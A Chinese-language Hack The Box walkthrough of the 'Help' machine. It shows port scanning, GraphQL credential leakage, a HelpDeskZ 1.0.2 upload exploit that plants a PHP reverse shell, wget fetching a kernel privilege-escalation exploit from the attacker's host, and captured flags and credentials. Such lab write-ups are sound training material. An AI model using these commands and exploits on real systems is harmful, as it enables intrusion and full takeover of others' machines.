Hackthebox - Help
靶场信息
靶场类型
信息收集
Nmap
┌──(root㉿lucifiel)-[~/Desktop]
└─# nmap -sS -sC -sV -A -p- --min-rate 5000 10.10.10.121
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 09:14 CST
Nmap scan report for 10.10.10.121
Host is up (0.35s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
| 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp open http Apache httpd 2.4.18
|_http-title: Did not follow redirect to http://help.htb/
|_http-server-header: Apache/2.4.18 (Ubuntu)
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), Linux 3.18 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.10 - 4.11 (93%), DD-WRT (Linux 3.18) (93%), Linux 4.10 (93%), Linux 4.2 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 1720/tcp)
HOP RTT ADDRESS
1 349.63 ms 10.10.14.1
2 349.25 ms 10.10.10.121
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.59 seconds
Http
直接访问会被跳转到 htlp.htb 去加一个 hosts
echo 10.10.10.121 help.htb >> /etc/hosts
现在可以访问了,不过是 apache2 的默认界面,去 fuzz 一下
Fuzz
┌──(root㉿lucifiel)-[~/Desktop]
└─# gobuster dir -u http://help.htb/ --wordlist /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 200 --no-error
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://help.htb/
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/09/04 20:36:06 Starting gobuster in directory enumeration mode
===============================================================
/javascript (Status: 301) [Size: 309] [--> http://help.htb/javascript/]
/support (Status: 301) [Size: 306] [--> http://help.htb/support/]
/server-status (Status: 403) [Size: 296]
===============================================================
2022/09/04 20:37:41 Finished
===============================================================
有一个 support 目录,访问一下
是一个登录页面,并且可以确定框架为 helpdeskz
┌──(root㉿lucifiel)-[~/Desktop]
└─# searchsploit helpdeskz
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
HelpDeskZ 1.0.2 - Arbitrary File Upload | php/webapps/40300.py
HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download | php/webapps/41200.py
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
可以看到有两个漏洞,分别是 1.0.2 版本的任意文件上传以及 1.0.2 版本以下的 sql 注入,但是我们无法确定当前 cms 的版本号
┌──(root㉿lucifiel)-[~/Desktop]
└─# curl http://help.htb/support/README.md
{% image Hackthebox-Help//images/logo.png '' '' %}
Version: 1.0.2 from 1st June 2015<br>
Developed by: Evolution Script S.A.C.<br>
[Help Desk Software HelpDeskZ](http://www.helpdeskz.com)
HelpDeskZ is a free PHP based software which allows you to manage your site's support with a web-based support ticket system.
## Requirements
HelpDeskZ requires:
- PHP 5.x
- MySQL database
- GD Library (only for captcha verification)
- Mod_rewrite (only if you want to use permalinks)-
## Upgrading
To upgrade your HelpDeskZ from previous versions, please read the file UPGRADING.txt
## Installation steps
- Connect with FTP to the <em>public folder</em> of your server where the rest of your Web site is
- Create a new folder where you will install HelpDeskZ. Name it anything you like, for example "helpdesk" or "support".<br>
Example: /public_html/support<br>
Corresponding URL: http://www.site.com/support
- Upload all HelpDeskZ files to your server.
- Open **/install** in your browser, for example (modify to your URL):<br />
http://www.site.com/support/install
- The HelpDeskZ setup script will run. Click <strong>INSTALL HELPDESKZ</strong> and follow the instructions through License agreement, Check Setup and Database settings.
- Before closing the install script **DELETE the "install" directory from your server!**
- Now it's time to setup your help desk! Open the <strong>staff</strong> panel in your browser, for example:<br />
http://www.site.com/support/?v=staff<br />
Use the login details that you entered in the installation process.
- Go to <strong>Settings -> General</strong> to get to the settings page.
- Take some time and get familiar with all of the available settings. Most of them should be self-explanatory.
- If you want to use permalinks like http://www.site.com/support/staff/ then you have to enable this option on Settings -> General -> Helpdesk -> Use SEO-friendly URLs
- Good luck using HelpDeskZ!
-
## Email Piping
HelpDeskZ supports email piping, this allows the auto-creation of tickets from incoming emails to a set email address.
- To enable email piping for your help desk follow this <a href="http://www.helpdeskz.com/help/knowledgebase/2/article/10/setting-up-email-piping">email piping tutorial.</a>
## Customize the look
For detailed information please see this <a href="http://www.helpdeskz.com/help/knowledgebase/2/article/6/how-do-i-customize-helpdeskz-look">knowledgebase article.</a>
## Translate HelpDeskZ to your language
To translate HelpDeskZ read <a href="http://www.helpdeskz.com/help/knowledgebase/2/article/8/how-can-i-translate-helpdeskz">How can I translate HelpDeskZ.</a>
通过 README.md 得知当前版本为 1.0.2
根据漏洞,当前应该是可以直接进行 sql 注入尝试的,不过咱们再看看更多思路
3000 端口
这边有个 3000 端口可以访问
"Hi Shiv, To get access please find the credentials with given query"
这提示我们,想要获得权限,需要通过给定的查询找到答案
┌──(root㉿lucifiel)-[~/Desktop]
└─# dirsearch -u "http://10.10.10.121:3000"
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/10.10.10.121-3000/_22-07-01_09-29-39.txt
Error Log: /root/.dirsearch/logs/errors-22-07-01_09-29-39.log
Target: http://10.10.10.121:3000/
[09:29:40] Starting:
[09:33:40] 400 - 18B - /graphql/
[09:33:40] 400 - 18B - /graphql/console/
[09:33:40] 400 - 18B - /graphql
Task Completed
找到了一个 /graphql 目录,这个目录下还有一个 /console 目录,去访问一下
这边提示需要一个 get 参数 query
随便加一个参数后倒是出来数据了,但是提示语法错误,去找一下query相关的功能
找到相关的利用方式,然后读取到了一个账号密码
漏洞利用
得到解密后的账号密码
username = helpme@helpme.com
password = godhelpmeplz
在 80 端口成功登录
把时区修改为我们当前环境的时区
在 Submit a Ticket 中尝试上传一个 php 文件
这里提示上传失败,但是其实是成功的,不过会被修改为随机文件名,找到就可以了,所以我们还是去利用脚本吧
┌──(root㉿lucifiel)-[~/Desktop]
└─# python2 40300.py http://help.htb/support/uploads/tickets/ 1.php
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
found!
http://help.htb/support/uploads/tickets/9d831815c3faa6a961d01bd9dc543aca.php
上传成功,去尝试访问看看
成功上传并且访问成功,去制作一个 php 的 revershell
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
然后去网页端上传,接着使用 nc 监听一个端口,然后运行 exploit
┌──(root㉿lucifiel)-[~/Desktop]
└─# python2 40300.py http://help.htb/support/uploads/tickets/ phpshell.php
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
┌──(root㉿lucifiel)-[~/Desktop]
└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.121] 35558
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
19:41:30 up 1 day, 9:53, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')";
help@help:/$ id&&whoami
id&&whoami
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
help
成功弹回 shel
cat user.txt
64cf57c35b4e6991534e125790ad0b55
成功拿到 user 权限的 flag 文件
权限提升
首先使用 python 开启一个 http 服务器,然后上传一个 linpeas 提权辅助脚本
╔═══════════════════╗
═════════════════════════════════════════╣ Basic information ╠═════════════════════════════════════════
╚═══════════════════╝
OS: Linux version 4.4.0-116-generic (buildd@lgw01-amd64-021) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018
User & Groups: uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
Hostname: help
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
这边看到了系统版本是 ubuntu 4.40,去搜索下是否有漏洞
┌──(root㉿lucifiel)-[~/Desktop]
└─# searchsploit 4.4.0-116
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
找到一个 传到服务器去,然后编译运行
help@help:/tmp$ wget http://10.10.14.9/44298.c
wget http://10.10.14.9/44298.c
--2022-09-04 20:40:43-- http://10.10.14.9/44298.c
Connecting to 10.10.14.9:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5773 (5.6K) [text/x-csrc]
Saving to: '44298.c'
44298.c 100%[===================>] 5.64K --.-KB/s in 0s
2022-09-04 20:40:43 (20.3 MB/s) - '44298.c' saved [5773/5773]
传输进来以后,去进行编译
help@help:/tmp$ gcc 44298.c -o exploit
gcc 44298.c -o exploit
接着运行
help@help:/tmp$ ./exploit
./exploit
task_struct = ffff880037ee8000
uidptr = ffff880036f91084
spawning root shell
root@help:/tmp# whoami&&id
whoami&&id
root
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare),1000(help)
root@help:/root# cat root.txt
cat root.txt
9123b571740b6f2c3b1a7fa657c55f20
成功拿到 root 权限的 flag 文件